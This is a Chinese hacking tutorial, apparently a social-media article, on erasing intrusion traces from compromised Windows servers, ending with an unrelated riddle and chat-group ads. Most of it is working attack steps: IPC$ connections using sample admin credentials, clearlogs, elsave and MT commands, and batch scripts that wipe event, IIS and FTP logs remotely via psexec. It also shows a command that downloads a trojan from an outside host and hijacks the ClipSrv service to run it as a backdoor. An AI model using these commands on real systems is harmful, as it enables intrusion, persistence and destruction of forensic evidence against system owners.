一、黑客足迹：日志

（一）日志的定义

1. 日志文件的默认位置

⑴ DNS日志的默认位置：%systemroot%\system32\config，默认文件大小为512KB，管理员都会改变这个默认大小。

⑵ 安全日志文件默认位置：%systemroot%\system32\config\SecEvent.EVT。

⑶ 系统日志文件默认位置：%systemroot%\system32\config\sysEvent.EVT。

⑷ 应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT。

⑸ Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志。

⑹ Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志。

⑺ Scheduler服务日志默认位置：%systemroot%\schedlgu.txt。

2. 日志在注册表里的键

⑴ 应用程序日志、安全日志、系统日志、DNS服务器日志的文件在注册表中的键为：HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog，有的管理员很可能将这些日志重定位。其中Eventlog下面有很多子表，里面可查看到以上日志的定位目录。

⑵ Schedluler服务日志在注册表中的键为：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent。

⑶ FTP和WWW日志

FTP日志和WWW日志在默认情况下，每天生成一个日志文件，包括当天的所有记录。文件名通常为ex（年份）（月份）（日期），从日志里能看出黑客入侵时间，使用的IP地址以及探测时使用的用户名，这样使得管理员可以想出相应的对策。

（二）为什么要清除日志

Windows网络操作系统都设计有各种各样的日志文件，如应用程序日志，安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等，这些根据用户的系统开启的服务的不同而有所不同。

当在系统上进行一些操作时，这些日志文件通常会记录下大家操作的一些相关内容，这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测，系统就会在安全日志里迅速地记下探测者探测时所用的IP、时间、用户名等，用FTP探测后，就会在FTP日志中记下IP、时间、探测所用的用户名等。

在Windows系统中，日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等，其扩展名为log.txt。

黑客们在获得服务器的系统管理员权限之后就可以随意破坏系统上的文件了，包括日志文件。但是这一切都将被系统日志所记录下来，所以黑客们想要隐藏自己的入侵踪迹，就必须对日志进行修改。最简单的方法就是删除系统日志文件，但这样做一般都是初级黑客所为，真正的高级黑客们总是用修改日志的方法来防止系统管理员追踪到自己，网络上有很多专门进行此类功能的程序，例如Zap、Wipe等。

当前的计算机病毒越来越复杂，对于网上求助这种远程的判断和分析来说，必须借助第三方的软件分析，借助日志文件的内容，高手们能够分析出用户的系统的大部分故障以及IE浏览器被劫持、恶意插件、流氓软件以及部分的木马病毒等。

为了防止管理员发现计算机被黑客入侵后，通过日志文件查到黑客的来源，入侵者都会在断开与入侵自己的主机连接前删除入侵时的日志。

二、清除日志文件

（一）手工清除日志文件

这里以删除IIS日志为例，来介绍手工删除日志的方法，具体的操作步骤如下。

➊ 由于IIS日志一般都保存在“C:\Windows\system32\LogFiles\W3SVC1”目录下。所以可以在该目录下可看到所有的IIS文件。

➋ 右击要删除的日志文件并按下del键，即可看到【删除文件或文件夹时出错】提示框，要删除IIS中的www和FTP日志必须先关闭相应的服务才可以进行。

➌ 出现这种情况是因为相应的服务还在运行，此时在【Internet信息服务】窗口中可以看到网站正在运行。

➍ 右击“默认网站”图标，在弹出的快捷菜单中选择【停止】菜单项，即可将其停止。

➎ 如果想彻底删除日志文件，则可以在【服务】窗口中的【服务】列表中右击【Event Log】服务，在弹出的快捷菜单中选择【属性】菜单项，即可打开【Event Log（本地计算机）属性】对话框。

➏ 在【启动类型】下拉列表中选择【已禁用】选项之后，单击【确定】按钮，重新启动计算机后即可禁用该服务。

（二）利用工具清除日志文件

1、使用clearlogs工具删除事件日志的具体操作步骤如下：

➊ 在【命令提示符】窗口中输入“netuse \\192.168.0.10\ipc$ "037971"/Aministrator”命令与远程主机建立IPC$连接。

➋ 如果在本地【命令提示符】窗口中输入“clearlogs \\192.168.0.10 -app”命令，即可清除远程计算机的应用程序日志。

➌ 如果在本地【命令提示符】窗口中输入“clearlogs \\192.168.0.10 -sec”命令，即可清除远程计算机的安全日志。

➍ 如果想清除远程计算机的系统日志，则可在【命令提示符】窗口中输入“clearlogs\\192.168.0.10 –sys”。

➎ 通过上述操作，黑客可以成功删除注定主机/服务器中的事件日志。为了简化命令的输入过程，可以建立一个批处理文件clear.bat。其具体的内容如下。

@echo off

clearlogs –app

clearlogs –sec

clearlogs –sys

del clearlogs.exe

del c.bat

exit

➏ 将该bat文件保存为clear.bat，并与工具clearlogs.exe存放在同一个文件夹中。在【命令提示符】窗口中输入“clear.bat 192.168.0.10 administrator 037971”命令，按下回车键，即可将该远程主机上的事件日志全部清除。

2、使用elsave.exe删除远程主机中日志的具体操作步骤如下：

➊ 在本地【命令提示符】窗口中输入“netuse \\192.168.0.7\ipc$ /user:administrator”命令会出现“输入密码”提示信息。在其中输入远程主机的密码后，即可与远程主机/服务器进行连接用IPC$连接。

➋ 在本地【命令提示符】窗口中输入“elsave –s\\192.168.0.7 –l application –C”命令，即可删除远程计算机中的应用程序日志。

➌ 如果想删除该远程主机中的系统日志，则在【命令提示符】窗口中输入命令“elsave–s\\192.168.0.7 –l system –C”，即可将其删除。

3、使用Mt工具清除入侵记录的操作步骤如下：

➊ 在远程溢出主机【命令提示符】窗口中输入“mt –clog”命令，按下Enter键执行命令，即可在【命令提示符】窗口中查看mt清除日志记录参数。

➋ 一般情况下，入侵者会删除所有的入侵记录，因此常常在【命令提示符】窗口中输入“mt–clog all”命令，按下Enter键，即可清除所有的入侵记录。

➌一些比较谨慎的入侵者，除了清除入侵日志记录外，甚至还会将已删除的文件彻底清空，在溢出窗口中输入“mt –secdel –z”命令，然后按下Enter键执行命令，即可开始清除当前硬盘中所有空闲空间中的残留信息。操作完成后，管理员就再也无法清除已被删除的系统日志。

➍ 在【命令提示符】窗口中输入“elsave –s\\192.168.0.7 –l security –C”命令，即可清除远程主机的安全日志。

➎ 在本地【命令提示符】窗口中键入“netuse\\192.168.0.7\ipc$/ del”命令，即可断开IPC$连接。这样，黑客便成功地删除了远程主机中的事件日志。

➏ 另外，也可以编写一个批处理文件clear.bat，具体的内容如下。

net use \\%1\ipc$ %3 /user:%2

elsave –s\\%1 –l “application” –C

elsave –s\\%1 –l “system” –C

elsave –s\\%1 –l “securtity” –C

net use \\%1\ipc$ /del

➐ 把该文件存储到和Elsave.exe文件相同的文件夹下之后，在【命令提示符】窗口中运行“Clear.bat 192.168.0.7 Adminstrator"037971"”命令，即可清除远程计算机的日志记录。

三、技巧

（一）清除WWW和FTP日志

黑客在对目标服务器实施入侵之后，为了防止网络管理员对其进行追踪，往往要删除留下的IP记录和FTP记录，但这种系统日志用手工的方法很难清除，这时需要借助于其他软件进行清除。在Windows 2000系统中，WWW日志一般都存放在%winsystem%\sys tem32\logfiles\w3svc1文件夹中，包括WWW日志和FTP日志。

Windows系统中一些日志存放路径和文件名如下：

⑴ 安全日志：C:\windows\system\system32\config\Secevent.evt。

⑵ 应用程序日志：C:\windows\system\system32\config\AppEvent.evt。

⑶ 系统日志：C:\windows\winsystem\system32\config\SysEvent.evt。

⑷ IIS的FTP日志：C:\windows\system%\system32\logfiles\msftpsvc1\，默认每天一个日志。

⑸ IIS的WWW日志：C:\windows\system\system32\logfiles\w3svc1\默认每天一个日志。

⑹ Scheduler服务日志：C:\windows\winsystem\schedlgu.txt。

⑺ 注册表项目如下：[HKLM]\system\CurrentControlSet\Services\Eventlog。

⑻ Schedluler服务注册表所在项目：[HKLM]\SOFTWARE\Microsoft\SchedulingAgent。

1．清除WWW日志

在IIS中WWW日志默认的存储位置是：C:\windows\system\system32\logfiles\w3svc1\，每天都产生一个新日志。如果管理员对其存放位置进行了修改，则可以运用iis.msc对其进行查看，再通过查看网站的属性来查找到其存放位置，此时，就可以在【命令提示符】窗口中通过“del *.*”命令来清除日志文件了。

但这个方法删除不掉当天的日志，这是因为w3svc服务还在运行着。可以用“net stop w3vsc”命令把这个服务停止之后，再用“del *.*”命令，就可以清除当天的日志了。

还可以用记事本把日志文件打开，删除其内容之后再进行保存也可以清除日志。最后用“net start w3svc”命令再启动w3svc服务就可以了。

2．清除FTP日志

FTP日志的默认存储位置为C:\windows\system\system32\logfiles\w3svc1\，其清除方法和清除WWW日志的方法差不多，只是所要停止的服务不同。

清除FTP日志的具体操作步骤如下。

➊ 在【命令提示符】窗口中运行“netstop mstfpsvc”命令即可停掉msftpsvc服务。

➋ 运行“del*.*”命令或找到日志文件，并将其内容删除。

➌ 最后通过运行“netstart msftpsvc”命令，再打开msftpsvc服务即可。

（二）使用批处理清除远程主机日志

具体的操作步骤如下。

➊ 在记事本中编写一个可以清除日志的批处理文件，其具体的内容如下。

@del C:\Windows\system32\logfiles\*.*

@del C:\Windows \system32\config\*.evt

@del C:\Windows \system32\dtclog\*.*

@del C:\Windows \system32\*.log

@del C:\Windows \system32\*.txt

@del C:\Windows \*.txt

@del C:\Windows t\*.log

@del c:\del.bat

➋ 把上述内容保存为del.bat备用。再新建一个批处理文件并将其保存为clear.bat文件，其具体内容如下。

@copy del.bat

@echo 向肉鸡复制本机的del.bat……OK

@psexec \\1 c:\del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

在上述代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，它是删除文件命令。

➌ 假设已经与肉鸡进行了IPC连接之后，在【命令提示符】窗口中输入“clear.bat192.168.0.10”命令，即可清除该主机上的日志文件。

（三）后门程序的上传与隐藏

➊ 在使用MT上传木马后门之前，需要将木马后门服务端程序传输到网站空间之中，或在入侵者所在的本地主机上搭建Web服务器，提供木马后门程序的下载，MT上传文件的命令格式为：mt –netget <url><filenameto saved>， 其中，<url>参数用于指定木马程序链接地址，<filenameto saved>用于指定木马保存文件名，–netget参数用于实现下载上传。

➋ 打开服务器的溢出【命令提示符】窗口，在其中输入“mt –netget http://www.newtop01.com/server.exeC:\WINDOWS\system32 \server.exe”，然后按下Enter键执行该命令，即可将木马服务端程序上传到服务器上，并以“server.exe”的名称保存在C盘目录下。

➌ 用木马后门替换系统中已有的服务时一种比较好的木马后门隐藏方式，可用MT来完成这个操作。在溢出【命令提示符】窗口之中输入命令：“mt –enumsrvsrv”，按下Enter键执行命令，即可在窗口之中查看系统中所有安装的服务信息。

➍ 在服务信息列表中可以看到一个名称为“ClipSrv”的服务，这是用来进行剪贴板远程查看用的，若进行修改替换，不会影响到系统的正常运行，因此可以修改这个服务，调用隐藏木马程序，首先查看该服务的详细信息，在溢出【命令提示符】窗口之中输入：“mt –querysrvclipsrv”命令，按下Enter键执行该命令，从返回的信息可知，该服务当前是停止状态的，服务调用的文件路径是“C:\WINDOWS\system32\clipsrv.exe”。

➎ 使用MT命令参数“-cfgsrv”可以更改某个服务的选项，包括更改某个服务的调用程序路径、服务描述及启动方式等。在溢出【命令提示符】窗口之中输入命令：“mt –cfgsrvclipsrvpath=C:\WINDOWS\system32\server.exe starttype=auto”，其中，“Path=”参数用于指定服务程序文件名路径，使用上传的木马后门替换了源程序文件路径名，“starttype=auto”参数用于指定服务为自动运行方式，命令执行后提示更改服务成功。

➏ 在【命令提示符】窗口中依次执行命令：“mt –stopsrvclipsrv”和“mt –startsrvclipsrv”，其中，第一条命令停止Clipsrv服务，第二次命令重新启动服务，重启Clipsrv服务后，可以看到该服务已被木马程序替换。

1992年大年三十晚上，一家人包好了2盖帘饺子放在那里，凌晨5时左右，起床准备煮饺子，发现2盖帘饺子全没有了，仅剩下2个空空的盖帘。屋里没有任何凌乱的迹象，并且门窗紧闭，一家人没敢声张，默默地和面、调馅儿重新包了饺子。请问饺子去哪里了？（答案分析请回复：jz）

回复：微信群，可加微信群交流。

QQ群：16004488